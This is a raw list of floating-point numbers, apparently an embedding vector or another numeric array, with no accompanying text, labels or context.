0.01577027700841427, 0.008635417558252811, 0.017342977225780487, 0.0058326940052211285, 0.010071046650409698, -0.00009519384184386581, 0.012891804799437523, -0.009861834347248077, -0.008642631582915783, -0.025927895680069923, 0.015654850751161575, 0.03497452288866043, -0.022234216332435608, -0.002707134699448943, 0.002607939299196005, -0.015539422631263733, -0.041149891912937164, 0.012422881089150906, -0.00023874548787716776, 0.0356382317841053, 0.0034069139510393143, -0.017847971990704536, 0.002102944068610668, 0.021657077595591545, 0.023907914757728577, -0.019709240645170212, -0.0030606314539909363, 0.0030894882511347532, -0.00524473562836647, 0.02031523361802101, 0.01478914450854063, 0.01142731960862875, 0.002184104174375534, -0.017039980739355087, -0.017833543941378593, -0.02519204467535019, -0.01139846257865429, 0.005086022894829512, -0.015452852472662926, -0.0006231279694475234, -0.0027287774719297886, -0.005774980410933495, -0.007437857333570719, -0.011737530119717121, 0.011824101209640503, -0.008418991230428219, -0.0002049288450507447, 0.01852610893547535, 0.011687031015753746, 0.024398481473326683, 0.00391731970012188, 0.020632660016417503, -0.022421784698963165, 0.013620440848171711, 0.026303034275770187, -0.00919091235846281, -0.020127665251493454, -0.03713878616690636, -0.01290623378008604, 0.002979471581056714, 0.00539623387157917, 0.014543861150741577, 0.009125984273850918, -0.00008149810309987515, 0.0037081073969602585, -0.014846857637166977, 0.01796340011060238, -0.00047613828792236745, -0.002443815814331174, 0.026230892166495323, -0.005735302343964577, 0.0350322350859642, -0.006182583514600992, -0.0002709840191528201, 0.011521103791892529, 0.014089365489780903, -0.02311434969305992, 0.004851560574024916, 0.00598058570176363, -0.026606030762195587, 0.016910124570131302, -0.01812211237847805, -0.014313005842268467, -0.0029289720114320517, 0.011326320469379425, 0.014139864593744278, 0.002970453817397356, -0.0235616322606802, -0.010770825669169426, -0.027038883417844772, 0.012069384567439556, 0.001891928375698626, 0.011470604687929153, 0.0117808161303401, -0.003722535911947489, -0.030472850427031517, -0.019521670415997505, 0.016058845445513725, -0.014478933066129684, 0.027457308024168015, -0.004104889463633299, 0.020849086344242096, 0.02514875866472721, -0.031482841819524765, -0.0021804969292134047, -0.03044399432837963, 0.00023491293541155756, -0.00014597516565117985, 0.022566068917512894, 0.016837982460856438, -0.015221997164189816, -0.03953390568494797, -0.003776642493903637, 0.02535075694322586, -0.009587693959474564, -0.0037008931394666433, -0.013721439987421036, -0.02998228371143341, -0.015712564811110497, 0.00048560695722699165, 0.00037017950671724975, -0.014478933066129684, -0.0005306958337314427, 0.008476704359054565, 0.003783856751397252, -0.022017790004611015, -0.007401786278933287, -0.023330776020884514, 0.010200902819633484, -0.008447847329080105, 0.01786240004003048, 0.006189798004925251, -0.03589794412255287, -0.0050138807855546474, -0.0015267085982486606, 0.011340748518705368, -0.011189250275492668, -0.00457020616158843, -0.03910105302929878, 0.0004630625480785966, -0.00046621874207630754, -0.0051870220340788364, -0.02259492687880993, -0.021671507507562637, -0.02269592508673668, -0.002166068647056818, 0.005370984319597483, -0.026937885209918022, -0.018049970269203186, 0.003581858705729246, -0.010496685281395912, 0.0005708248936571181, -0.013483370654284954, -0.003693678881973028, -0.0077119977213442326, 0.008519990369677544, -0.01979581080377102, -0.025437328964471817, 0.006687578745186329, -0.013021660968661308, 0.00275402725674212, -0.004674812313169241, 0.000038889138522790745, 0.017617117613554, 0.012004456482827663, -0.02382134273648262, -0.024153197184205055, -0.014818001538515091, -0.019319672137498856, 0.01155717484652996, -0.021354081109166145, 0.008938414044678211, 0.005731695331633091, -0.00807270873337984, 0.030472850427031517, 0.025336328893899918, -0.0112253213301301, -0.009335196577012539, -0.02377805858850479, -0.004573813173919916, -0.001678207190707326, 0.013981152325868607, -0.022681497037410736, -0.0028874902054667473, -0.0007822916377335787, -0.008101565763354301, -0.004674812313169241, 0.018497250974178314, 0.018756963312625885, 0.015019998885691166, -0.025076616555452347, 0.0012994607677683234, -0.0024997261352837086, 0.010446186177432537, 0.014486147090792656, -0.003601697739213705, 0.008498347364366055, 0.008418991230428219, 0.016102131456136703, -0.026129892095923424, 0.005749730858951807, -0.00457020616158843, -0.005114879459142685, -0.0013220051769167185, 0.02672145888209343, 0.01246616616845131, 0.0007101494702510536, 0.026447318494319916, -0.0024005305022001266, -0.0008007780415937304, 0.007178145460784435, 0.0007890549604780972, 0.001779206213541329, -0.008404562249779701, -0.014745858497917652, 0.03858163207769394, -0.014183149673044682, 0.0089600570499897, 0.024109913036227226, -0.0348302386701107, 0.010273044928908348, -0.004126532003283501, -0.015438423492014408, -0.021541651338338852, -0.013375157490372658, 0.0019496420864015818, -0.01675141043961048, -0.004815489519387484, 0.010446186177432537, -0.02992457151412964, 0.009407338686287403, 0.0026746708899736404, 0.024701477959752083, -0.016578270122408867, -0.015755848959088326, -0.005774980410933495, 0.03757163882255554, 0.0023806914687156677, 0.007069932296872139, 0.029188720509409904, -0.004014711361378431, -0.02454276569187641, -0.0022364072501659393, 0.0007529838476330042, -0.01776140183210373, -0.0027089384384453297, 0.005421483889222145, 0.018309682607650757, -0.014248077757656574, 0.006669543217867613, -0.010539970360696316, -0.010785253718495369, 0.03353168070316315, -0.012458952143788338, 0.024903476238250732, -0.025581613183021545, 0.0031057202722877264, 0.01267537847161293, -0.00862820353358984, 0.011744745075702667, -0.019218673929572105, -0.0180211141705513, -0.03298339992761612, 0.004047175403684378, -0.012228096835315228, 0.019463956356048584, 0.021801363676786423, -0.00514012947678566, 0.0012444524327293038, -0.0009342410485260189, -0.014522218145430088, 0.005572982598096132, 0.0007786845089867711, -0.007185359951108694, 0.00086029531667009, 0.005435912404209375, 0.009717550128698349, -0.024355195462703705, 0.026000037789344788, -0.006045513786375523, -0.0062583331018686295, -0.012134312652051449, -0.005814658477902412, 0.019507242366671562, 0.011131536215543747, 0.001271505723707378, -0.016001133248209953, 0.01102332305163145, 0.006139298435300589, -0.008455062285065651, 0.0010190081084147096, -0.004429528955370188, 0.014010008424520493, 0.030068855732679367, 0.007289966102689505, 0.020170949399471283, 0.006081584841012955, 0.0035800549667328596, 0.014442862011492252, -0.01460878923535347, -0.04582470282912254, -0.0028910974506288767, 0.017169835045933723, -0.007452285848557949, -0.0021823004353791475, 0.011521103791892529, 0.02116651087999344, -0.0018558572046458721, 0.022580498829483986, 0.016159845516085625, -0.015135427005589008, 0.007185359951108694, 0.011831315234303474, 0.07895238697528839, 0.000997365452349186, 0.011268606409430504, -0.030097711831331253, 0.01908881776034832, 0.016304129734635353, -0.0013265140587463975, 0.01096560899168253, -0.00029938999796286225, 0.011499461717903614, -0.01979581080377102, -0.012170383706688881, 0.01771811582148075, -0.009169269353151321, 0.0028405978810042143, -0.010417329147458076, 0.015914561226963997, 0.018006684258580208, 0.026432890444993973, 0.01893010549247265, -0.007531642448157072, -0.0008896031067706645, -0.011153179220855236, 0.0068715414963662624, 0.008851843886077404, 0.006074370350688696, 0.014551075175404549, -0.004458385985344648, 0.006099620368331671, -0.00024821414262987673, -0.001687224954366684, -0.006395403295755386, 0.0026854921597987413, -0.02213321626186371, 0.01582799106836319, 0.020430661737918854, 0.0073296441696584225, -0.0023915127385407686, -0.010143188759684563, 0.008685916662216187, 0.005302449222654104, 0.00017708647646941245, 0.015077712945640087, -0.008895128965377808, -0.007178145460784435, -0.006355724763125181, 0.009046628139913082, 0.0026566353626549244, -0.016924552619457245, 0.009602122008800507, 0.006756113842129707, -0.01653498411178589, 0.0015934400726109743, -0.0030516136903315783, 0.0018441341817378998, 0.014060508459806442, -0.005796622950583696, -0.00011678013106575236, 0.006550508551299572, -0.016520556062459946, -0.009890691377222538, -0.008837415836751461, 0.005821872968226671, -0.007362108211964369, -0.017487261444330215, 0.004523314069956541, -0.011679816991090775, -0.012574379332363605, -0.008859057910740376, -0.011889029294252396, 0.00024956680135801435, 0.005057165864855051, 0.001217399025335908, 0.009804120287299156, -0.0023392096627503633, -0.0021444258745759726, 0.022263072431087494, 0.025581613183021545, -0.01064096949994564, -0.007820211350917816, 0.024355195462703705, -0.00042699146433733404, 0.020849086344242096, -0.014594360254704952, -0.011622102931141853, 0.009486694820225239, -0.019723668694496155, 0.004873203579336405, -0.018453966826200485, -0.009832977317273617, -0.0006285386043600738, 0.01975252479314804, 0.0020704802591353655, 0.018598251044750214, -0.01157881785184145, 0.020401805639266968, -0.01473143044859171, -0.02295563742518425, 0.004180638585239649, 0.017241977155208588, -0.015034427866339684, 0.02565375529229641, -0.017674831673502922, 0.004173424560576677, -0.004094067960977554, 0.01644841395318508, 0.005010273307561874, -0.0010253204964101315, 0.010633755475282669, -0.02561046928167343, -0.016361843794584274, 0.014421219006180763, 0.010554399341344833, 0.013447299599647522, 0.0010487667750567198, 0.004184245597571135, 0.010085474699735641, 0.01478914450854063, -0.006943683605641127, -0.01735740527510643, -0.006539687514305115, -0.010518328286707401, -0.023056635633111, -0.019925666972994804, -0.03497452288866043, -0.0001471023861085996, -0.022825781255960464, -0.008938414044678211, 0.002613350050523877, 0.00021901911532040685, 0.010359615087509155, 0.038350775837898254, -0.006893184036016464, 0.004909274633973837, -0.005854337010532618, -0.00363957230001688, -0.0021606578957289457, -0.01096560899168253, 0.008866271935403347, -0.02021423541009426, -0.00859934650361538, -0.006741685327142477, -0.01882910542190075, 0.0036810541059821844, -0.005425090901553631, 0.013584369793534279, -0.01776140183210373, -0.006853505969047546, 0.018352966755628586, -0.00014845505938865244, 0.02885686606168747, -0.01529413927346468, 0.00784185342490673, -0.007322430144995451, 0.00789235346019268, -0.009392909705638885, -0.0028874902054667473, -0.004811882507055998, -0.011283034458756447, 0.008007780648767948, -0.028539441525936127, -0.00019512201834004372, 0.003628751030191779, 0.007618212606757879, 0.014753073453903198, 0.020243091508746147, -0.029607145115733147, 0.014392361976206303, 0.008339634165167809, 0.015337424352765083, -0.01064096949994564, 0.009558836929500103, -0.02682245709002018, 0.006521651986986399, -0.0024474230594933033, 0.002550225704908371, -0.002898311475291848, 0.005767766386270523, -0.010157616809010506, -0.007654284127056599, -0.006575758568942547, -0.018901247531175613, 0.009364053606987, -0.010337972082197666, -0.008029422722756863, 0.01623198762536049, -0.0011317302705720067, 0.01555385161191225, 0.00181978615000844, -0.024513907730579376, -0.004783025477081537, 0.011535532772541046, -0.008541632443666458, -0.028063302859663963, 0.000015851550415391102, -0.009414552710950375, 0.04302558675408363, -0.021238654851913452, -0.0027107419446110725, -0.0001970382872968912, 0.00007873641152400523, -0.010359615087509155, -0.006720042787492275, 0.006182583514600992, -0.00928469654172659, 0.02035851962864399, -0.008844629861414433, 0.0071745384484529495, 0.0009279286023229361, -0.0008593935635872185, -0.058666009455919266, -0.02255164086818695, 0.007704783231019974, 0.0063701532781124115, -0.005132914986461401, 0.008642631582915783, 0.009299125522375107, -0.009457837790250778, 0.008902342990040779, -0.012552737258374691, 0.012516666203737259, 0.015438423492014408, -0.013800796121358871, 0.0058687650598585606, -0.015957847237586975, -0.017876828089356422, -0.02636074833571911, -0.00862820353358984, 0.012704235501587391, -0.004205888137221336, -0.028063302859663963, -0.01397393736988306, 0.014890143647789955, 0.013685368932783604, 0.00009885731560643762, 0.013425657525658607, 0.02672145888209343, -0.011802458204329014, -0.009046628139913082, -0.03777363896369934, 0.018078826367855072, -0.0044511714950203896, -0.004602670203894377, -0.007308001630008221, 0.0028117408510297537, 0.016809124499559402, 0.004544956609606743, 0.023186491802334785, 0.0014590753708034754, -0.000026729236196842976, -0.011723102070391178, -0.019406242296099663, -0.01711212284862995, -0.003985854797065258, 0.019406242296099663, -0.011059394106268883, 0.03976476192474365, 0.006860719993710518, -0.01196117140352726, -0.005241128616034985, -0.019059959799051285, -0.0069833616726100445, 0.017544975504279137, 0.018554965034127235, 0.007210609503090382, 0.01066261250525713, -0.001554663642309606, 0.026533888652920723, -0.007921209558844566, 0.004234745167195797, -0.00043668554280884564, -0.0010099903447553515, 0.001824295031838119, -0.0015474495012313128, 0.0031327735632658005, 0.0110738230869174, 0.01157881785184145, -0.004140960518270731, -0.02631746232509613, 0.020113235339522362, -0.011665388010442257, 0.0026818851474672556, 0.015943419188261032, -0.0064675454050302505, 0.017645973712205887, -0.010907895863056183, -0.003529555629938841, -0.001608770340681076, 0.013620440848171711, 0.028582725673913956, -0.0019171780440956354, 0.00836849119514227, -0.0068138279020786285, -0.03710993006825447, -0.0001791154791135341, 0.01562599278986454, 0.0019316065590828657, -0.009407338686287403, 0.011037751100957394, 0.023475060239434242, 0.010619327425956726, -0.00010387344809714705, 0.007683140691369772, 0.02550947107374668, -0.005334913264960051, -0.03171369805932045, 0.008253064006567001, -0.00140677229501307, 0.009760835207998753, -0.012458952143788338, -0.0007209707982838154, -0.0017530546756461263, 0.003399699693545699, 0.015250854194164276, -0.019305244088172913, 0.002862240420654416, 0.00001099040855478961, 0.0029938998632133007, -0.024109913036227226, 0.03572480008006096, -0.01402443740516901, -0.005857944022864103, 0.009840191341936588, 0.002050640992820263, -0.00039475291850976646, 0.004963381215929985, -0.018251968547701836, 0.004162603057920933, -0.0036720363423228264, -0.012083812616765499, 0.020647088065743446, -0.016938980668783188, 0.01705440878868103, 0.024759192019701004, 0.0016250023618340492, -0.0042275311425328255, 0.016405127942562103, 0.027818020433187485, 0.003291486296802759, 0.008664274588227272, -0.028582725673913956, 0.01302887499332428, -0.022479498758912086, 0.005883193574845791, 0.013555512763559818, 0.007073539309203625, -0.014846857637166977, -0.00789235346019268, -0.010215330868959427, 0.00008814870670903474, -0.021642649546265602, 0.016159845516085625, 0.007473928388208151, 0.0009531783871352673, 0.005111272446811199, -0.008303563110530376, -0.006323260720819235, 0.0115283178165555, 0.005587410647422075, -0.010532756336033344, -0.004505278542637825, 0.005493625998497009, -0.002285103080794215, -0.016058845445513725, -0.01232188194990158, -0.014262506738305092, 0.0030876847449690104, 0.0006835470558144152, 0.0009342410485260189, 0.008346849121153355, 0.007437857333570719, -0.015741420909762383, 0.0006871541263535619, -0.017847971990704536, -0.005984192714095116, 0.009998904541134834, -0.024066627025604248, -0.01310823205858469, 0.0033023077994585037, -0.020243091508746147, -0.010879038833081722, -0.003650393569841981, 0.01653498411178589, 0.0034880738239735365, 0.006305225193500519, -0.011441747657954693, -0.025264186784625053, 0.005526090040802956, 0.006207833532243967, -0.02015652135014534, -0.0005207762587815523, 0.012552737258374691, 0.014890143647789955, 0.006337689235806465, 0.014139864593744278, 0.0061212629079818726, 0.0051076654344797134, 0.003619733266532421, 0.015409566462039948, 0.020574945956468582, 0.009392909705638885, -0.006597401108592749, -0.01290623378008604, 0.0030498101841658354, 0.004353779833763838, -0.009097127243876457, 0.01104496605694294, 0.008541632443666458, 0.012596022337675095, -0.007928424514830112, 0.013194802217185497, -0.004811882507055998, 0.009919548407196999, 0.0017485457938164473, 0.01028025895357132, -0.003372646402567625, 0.00616094097495079, 0.007906781509518623, 0.01496228575706482, -0.004743347410112619, 0.007971709594130516, -0.002407744759693742, -0.005771373398602009, -0.028366299346089363, 0.008108779788017273, -0.023489490151405334, -0.007308001630008221, 0.00026624969905242324, 0.0061789765022695065, 0.028943438082933426, -0.007704783231019974, -0.009032199159264565, -0.0064495098777115345, 0.025105474516749382, -0.005692016799002886, 0.012054956518113613, -0.00023739281459711492, 0.014652074314653873, 0.004382636863738298, 0.005457554943859577, 0.006326868198812008, 0.007297180127352476, 0.02396562695503235, 0.011246963404119015, -0.003464627545326948, -0.02148393727838993, 0.0034880738239735365, 0.003574644448235631, 0.016102131456136703, -0.007567713502794504, -0.00022544426610693336, -0.036215368658304214, -0.0058182659558951855, -0.012119883671402931, 0.008657059632241726, 0.013158731162548065, -0.006788577884435654, -0.018728107213974, 0.0006141102057881653, -0.009919548407196999, -0.00590483658015728, 0.018352966755628586, 0.023273063823580742, 0.014291362836956978, 0.01216316968202591, -0.013598798774182796, -0.010092688724398613, 0.004328529816120863, -0.0022832995746284723, 0.009414552710950375, 0.0008841924136504531, -0.004443957470357418, 0.021094368770718575, 0.02392234280705452, -0.012992803938686848, -0.0019153745379298925, 0.013880153186619282, 0.023691488429903984, -0.000007027520496194484, -0.012220882810652256, -0.011622102931141853, -0.00799335166811943, -0.004360993858426809, -0.022176502272486687, 0.004552170634269714, 0.01934853009879589, -0.003830749075859785, -0.010554399341344833, -0.013678154908120632, 0.032088834792375565, 0.028741439804434776, -0.012228096835315228, -0.0031111310236155987, 0.0012859341222792864, 0.00107852544169873, -0.010366829112172127, 0.010835753753781319, -0.018814677372574806, 0.016679268330335617, -0.023172063753008842, -0.0017584653105586767, 0.014572718180716038, -0.009400124661624432, -0.009198126383125782, 0.0031940944027155638, -0.011737530119717121, 0.006582972593605518, -0.012098241597414017, 0.0019424278289079666, 0.024917904287576675, -0.0172131210565567, 0.026851315051317215, 0.0029668465722352266, 0.002012766432017088, 0.013266944326460361, 0.014334648847579956, -0.013310229405760765, 0.014385147951543331, 0.017328549176454544, 0.019810238853096962, 0.02605774998664856, -0.026909029111266136, 0.0066984002478420734, 0.0019081602804362774, 0.025033332407474518, -0.007906781509518623, 0.009407338686287403, 0.003574644448235631, 0.009263054467737675, 0.031482841819524765, -0.01806439831852913, -0.024658191949129105, 0.019420672208070755, 0.0029253647662699223, 0.019305244088172913, -0.025927895680069923, -0.006283582653850317, 0.012047741562128067, 0.0020776945166289806, -0.020632660016417503, 0.02865486964583397, 0.008505561389029026, 0.015380710363388062, 0.021310796961188316, -0.008058279752731323, -0.006218654569238424, -0.01643398590385914, -0.008267492055892944, -0.0015736010391265154, 0.018756963312625885, -0.011319106444716454, 0.00957326591014862, 0.004696454852819443, -0.0012318275403231382, 0.009371267631649971, 0.0183241106569767, 0.0003604853991419077, 0.004710883367806673, 0.02051723189651966, -0.005417876876890659, 0.018670393154025078, -0.02138293907046318, 0.0059661571867764, -0.008498347364366055, 0.0066984002478420734, 0.0006407126202248037, 0.0018720892257988453, -0.010915109887719154, -0.011477818712592125, -0.011860172264277935, 0.001568190404213965, 0.001440137973986566, -0.007127645891159773, 0.010597684420645237, 0.011982813477516174, -0.009710336104035378, -0.025437328964471817, -0.007048289757221937, -0.012069384567439556, 0.015164283104240894, -0.009905119426548481, -0.012971161864697933, -0.01653498411178589, -0.025264186784625053, 0.0036810541059821844, 0.002842401387169957, 0.009919548407196999, 0.01959381252527237, 0.01644841395318508, 0.004501671064645052, -0.011499461717903614, -0.0235616322606802, 0.013014446943998337, 0.013122660107910633, -0.00806549470871687, 0.009775263257324696, 0.003659411333501339, 0.016837982460856438, 0.008923985995352268, 0.01552499458193779, 0.0037982850335538387, 0.01414707861840725, -0.0016700911801308393, 0.005919264629483223, 0.007798568345606327, 0.017602689564228058, 0.011614888906478882, -0.018699249252676964, 0.003282468533143401, -0.01346172858029604, -0.016982266679406166, -0.0006398108671419322, -0.008433419279754162, 0.015380710363388062, -0.020704802125692368, -0.007683140691369772, 0.00030615332070738077, 0.0006059941952116787, -0.013367943465709686, -0.02092122845351696, 0.01634741574525833, -0.0037910707760602236, 0.004126532003283501, -0.005944514647126198, -0.006500009447336197, 0.023648202419281006, 0.00801499467343092, 0.011492246761918068, -0.0009603925864212215, -0.0006510830717161298, 0.023056635633111, 0.020170949399471283, -0.03318539634346962, 0.014904571697115898, 0.002393316477537155, -0.01310823205858469, -0.004631527233868837, 0.02615875005722046, 0.014038865454494953, -0.0054900189861655235, 0.0068138279020786285, -0.007877924479544163, -0.0030425959266722202, 0.011463390663266182, -0.011203678324818611, -0.02183021977543831, 0.0028117408510297537, 0.006766935344785452, 0.027904590591788292, -0.008289135061204433, -0.014803572557866573, -0.006507223471999168, -0.0044151004403829575, 0.004296066239476204, -0.025105474516749382, -0.013353515416383743, -0.01414707861840725, 0.01618870161473751, 0.009962833486497402, -0.005854337010532618, 0.01134796254336834, 0.010785253718495369, 0.00011063677811762318, -0.00860656052827835, 0.008714773692190647, 0.01367094088345766, -0.004552170634269714, 0.012841305695474148, -0.000305026100249961, -0.01715540699660778, 0.02325863391160965, -0.018670393154025078, 0.020993370562791824, 0.026072179898619652, -0.010200902819633484, -0.022378500550985336, 0.019925666972994804, -0.004801061004400253, 0.018756963312625885, 0.0050283088348805904, -0.0001970382872968912, 0.012033313512802124, 0.006507223471999168, -0.022378500550985336, -0.000012054223589075264, -0.030617136508226395, 0.00299750710837543, -0.00013797188876196742, 0.002559243468567729, -0.0009585890220478177, -0.01991123892366886, 0.018194254487752914, -0.014702573418617249, -0.01562599278986454, 0.023503918200731277, -0.0005816462216898799, -0.0006921139429323375, 0.0005054460489191115, -0.006337689235806465, 0.007524427957832813, -0.002586296759545803, 0.0052375211380422115, 0.0008287331438623369, -0.001266996841877699, -0.009789692237973213, 0.01496228575706482, 0.013577155768871307, -0.010619327425956726, -0.005295235197991133, -0.0096670500934124, 0.005854337010532618, 0.012985589914023876, -0.02056051790714264, -0.019478384405374527, -0.02377805858850479, -0.012336310930550098, 0.02208993211388588, 0.01695340871810913, -0.0033149325754493475, -0.004130139015614986, -0.005976978689432144, -0.00781299639493227, 0.01806439831852913, 0.005389019846916199, -0.0029776678420603275, -0.019579384475946426, 0.004393457900732756, -0.0018125718925148249, 0.017775829881429672, 0.012083812616765499, 0.019002247601747513, -0.011665388010442257, -0.002786491299048066, -0.005468376446515322, 0.011246963404119015, -0.03298339992761612, -0.013404014520347118, -0.013606012798845768, -0.013389586471021175, -0.01549613755196333, 0.009638193063437939, -0.018251968547701836, 0.00011858368816319853, -0.00026038812939077616, -0.005655945744365454, -0.019824666902422905, 0.02259492687880993, 0.020950084552168846, -0.014442862011492252, -0.010972823947668076, -0.015856849029660225, -0.00004069269198225811, -0.003201308660209179, 0.017992256209254265, 0.008938414044678211, -0.0005040934192948043, 0.0014058704255148768, 0.012199240736663342, 0.017645973712205887, 0.017645973712205887, 0.016318557783961296, 0.017025550827383995, -0.0017377244075760245, 0.017746973782777786, 0.018540536984801292, 0.009125984273850918, 0.01066261250525713, 0.013165945187211037, -0.004126532003283501, -0.011881815269589424, 0.04123646393418312, -0.0001829480315791443, 0.011434533633291721, -0.011506675742566586, 0.0060238707810640335, 0.011297463439404964, -0.016506128013134003, 0.0021444258745759726, -0.015755848959088326, -0.006265547126531601, -0.0009351428598165512, 0.009089913219213486, -0.0032968970481306314, -0.013541084714233875, -0.013858510181307793, -0.004909274633973837, 0.022724783048033714, 0.0004012908029835671, -0.0011308285174891353, 0.00764706963673234, 0.00721782399341464, -0.007755282800644636, -0.0025159581564366817, -0.003830749075859785, -0.010301901027560234, -0.006950897630304098, 0.003448395524173975, 0.013555512763559818, -0.005839908495545387, -0.011867386288940907, -0.005096843931823969, -0.012733092531561852, -0.007192573975771666, -0.019362958148121834, 0.011542746797204018, 0.011513889767229557, 0.02116651087999344, -0.01267537847161293, 0.026634888723492622, 0.005129307974129915, -0.017703687772154808, -0.020372947677969933, 0.008830200880765915, -0.010922323912382126, -0.01552499458193779, 0.0007421625196002424, -0.0031399878207594156, -0.00875805877149105, 0.006316046696156263, -0.02605774998664856, -0.0010343383764848113, -0.002613350050523877, -0.006521651986986399, 0.013685368932783604, -0.0004562991962302476, 0.005403448361903429, 0.008390134200453758, 0.007603784557431936, -0.013043303973972797, -0.020084379240870476, -0.010705897584557533, -0.03180026635527611, -0.0002896958903875202, -0.023374062031507492, -0.004000283312052488, -0.0030209531541913748, 0.00003006862971233204, 0.017039980739355087, -0.011239749379456043, -0.009616550989449024, 0.009400124661624432, 0.0009270268492400646, -0.009306339547038078, -0.02066151611506939, -0.008671488612890244, 0.002148033119738102, -0.012177597731351852, 0.0035079128574579954, 0.012689807452261448, 0.022739211097359657, 0.006038299296051264, 0.01084296777844429, -0.004346565343439579, -0.0029325790237635374, 0.024470623582601547, 0.000821068009827286, 0.008556061424314976, -0.024903476238250732, 0.001637627137824893, 0.005071594379842281, -0.038956768810749054, 0.012502237223088741, 0.0015203962102532387, 0.006045513786375523, 0.022306358441710472, -0.019968951120972633, -0.017068836838006973, -0.007683140691369772, -0.006261940114200115, 0.01766040176153183, -0.002211157465353608, -0.010164831764996052, -0.013064946047961712, 0.0011389444116503, -0.026490604504942894, -0.0008891522302292287, 0.01552499458193779, 0.008418991230428219, -0.007322430144995451, 0.021469509229063988, -0.005847122520208359, -0.0015014588134363294, 0.013137088157236576, -0.0004425471124704927, 0.006406224332749844, 0.01699669472873211, 0.00016592699103057384, -0.01725640706717968, -0.0054900189861655235, 0.0011741137132048607, 0.009796906262636185, 0.01592899113893509, 0.017804685980081558, 0.006885970011353493, 0.000992856570519507, -0.010778039693832397, 0.000578490027692169, -0.002012766432017088, -0.005634303204715252, -0.0034249494783580303, 0.01836739480495453, 0.009097127243876457, 0.009472266770899296, -0.028698153793811798, -0.012437309138476849, 0.022883495315909386, -0.01614541746675968, 0.011391248553991318, -0.0007444169605150819, -0.003421342233195901, -0.01346172858029604, 0.002716152695938945, 0.017184264957904816, 0.0009103439515456557, 0.01142731960862875, 0.01838182471692562, 0.015871277078986168, -0.00552248302847147, -0.011997242458164692, 0.007372929248958826, -0.01654941402375698, -0.018410680815577507, 0.02778916247189045, -0.015698134899139404, 0.006326868198812008, 0.008346849121153355, -0.01473143044859171, -0.009219769388437271, -0.009205340407788754, 0.016924552619457245, -0.007567713502794504, -0.011867386288940907, -0.0027125454507768154, -0.02361934632062912, 0.012220882810652256, -0.006687578745186329, -0.02051723189651966, 0.0030516136903315783, 0.01577027700841427, -0.0003068296646233648, -0.011311891488730907, 0.008830200880765915, -0.011600460857152939, -0.015712564811110497, 0.009962833486497402, -0.005039130337536335, -0.013562727719545364, -0.012220882810652256, -0.004948952700942755, -0.002014569938182831, -0.0064495098777115345, -0.0016168863512575626, 0.00021428478066809475, 0.00842620525509119, 0.011311891488730907, -0.0024744763504713774, -0.016001133248209953, -0.00446560001000762, 0.004043568391352892, -0.010886252857744694, -0.016910124570131302, -0.008180921897292137, -0.0021011405624449253, -0.01924753002822399, 0.030703706666827202, -0.016910124570131302, -0.0015023606829345226, -0.008354063145816326, -0.007964495569467545, 0.0018901247531175613, 0.009039413183927536, 0.022580498829483986, -0.027067741379141808, 0.0016809124499559402, -0.018612679094076157, -0.013202016241848469, -0.008036637678742409, 0.003356414381414652, 0.0017422332894057035, -0.014089365489780903, 0.003448395524173975, -0.007906781509518623, 0.00607076333835721, 0.0010460613993927836, 0.007495570927858353, 0.013728654012084007, 0.0029938998632133007, 0.009306339547038078, -0.003394288942217827, 0.011896243318915367, 0.026634888723492622, -0.013757511042058468, -0.0049345241859555244, -0.005168986041098833, -0.017126550897955894, 0.0047613829374313354, -0.00033343207906000316, -0.010417329147458076, -0.014717002399265766, 0.024831334128975868, -0.0038884629029780626, 0.019824666902422905, 0.003017346141859889, -0.00019196579523850232, 0.013252516277134418, 0.032608259469270706, -0.005572982598096132, -0.012798020616173744, -0.016044417396187782, 0.0223496425896883, -0.018612679094076157, -0.016520556062459946, -0.00836849119514227, 0.0047974539920687675, 0.0046098846942186356, -0.013476156629621983, -0.013021660968661308, -0.009414552710950375, 0.004837132524698973, 0.004296066239476204, -0.010179259814321995, -0.01745840348303318, 0.01781911589205265, -0.001179524464532733, -0.007037468254566193, -0.02682245709002018, -0.011391248553991318, 0.004115710500627756, -0.0223496425896883, -0.007365715224295855, 0.010915109887719154, -0.013274158351123333, 0.003758606966584921, -0.01665041223168373, -0.00995561946183443, -0.009645408019423485, 0.026952313259243965, 0.024470623582601547, -0.012076598592102528, 0.025220900774002075, -0.0029019187204539776, 0.003967819269746542, 0.034079961478710175, -0.008620988577604294, -0.028034446761012077, 0.0052230930887162685, -0.007210609503090382, 0.006777756381779909, -0.0035548051819205284, -0.00736932223662734, 0.0023446204140782356, -0.03872591629624367, 0.0058326940052211285, 0.009537194855511189, 0.008556061424314976, 0.013396800495684147, 0.005641517229378223, 0.009529979899525642, -0.006669543217867613, -0.01084296777844429, 0.0006803908036090434, -0.00789235346019268, -0.00030773141770623624, -0.010085474699735641, 0.0001909512939164415, -0.007087967824190855, 0.02184464782476425, -0.0021552471444010735, -0.011953957378864288, -0.01838182471692562, -0.005623481702059507, -0.00862820353358984, -0.01979581080377102, 0.0005095040542073548, -0.026101035997271538, -0.001938820700161159, 0.0235616322606802, -0.00030795688508078456, -0.03338739648461342, 0.01750168949365616, 0.03532080352306366, -0.01562599278986454, -0.03130970150232315, -0.010907895863056183, 0.011535532772541046, -0.000596525555010885, -0.0029650430660694838, -0.010121545754373074, 0.014486147090792656, -0.00799335166811943, -0.0063521177507936954, -0.007048289757221937, -0.011953957378864288, 0.015914561226963997, 0.00402192585170269, 0.013295801356434822, 0.026245320215821266, 0.01685241051018238, -0.009580479934811592, -0.008317992091178894, 0.015337424352765083, -0.0075388564728200436, -0.010388472117483616, 0.012610450387001038, -0.007517213933169842, 0.011622102931141853, 0.025927895680069923, 0.0002646715729497373, -0.009948404505848885, 0.01709769293665886, -0.00006921138992765918, -0.011239749379456043, 0.01139846257865429, -0.0014581735013052821, 0.013894581235945225, -0.003928141202777624, 0.009407338686287403, 0.014976713806390762, -0.004140960518270731, -0.029751429334282875, -0.03431081399321556, 0.032550547271966934, 0.00804385170340538, -0.026836887001991272, 0.00645311689004302, 0.015207569114863873, -0.0044367434456944466, -0.01254552323371172, 0.021137654781341553, -0.004000283312052488, 0.004483635537326336, -0.02031523361802101, 0.028683725744485855, 0.009335196577012539, -0.0013562727253884077, 0.011391248553991318, 0.031194273382425308, 0.00045246665831655264, 0.047007836401462555, -0.011412890627980232, 0.002559243468567729, -0.011795244179666042, -0.003834356088191271, 0.015900133177638054, -0.004577420651912689, 0.007849067449569702, 0.0002860887907445431, 0.015467280521988869, -0.013202016241848469, 0.010763611644506454, 0.007012218702584505, -0.0021462293807417154, 0.032406263053417206, -0.007394572254270315, -0.003457413287833333, -0.01134796254336834, 0.0057389093562960625, -0.009970047511160374, 0.008700345642864704, -0.00027684555971063673, 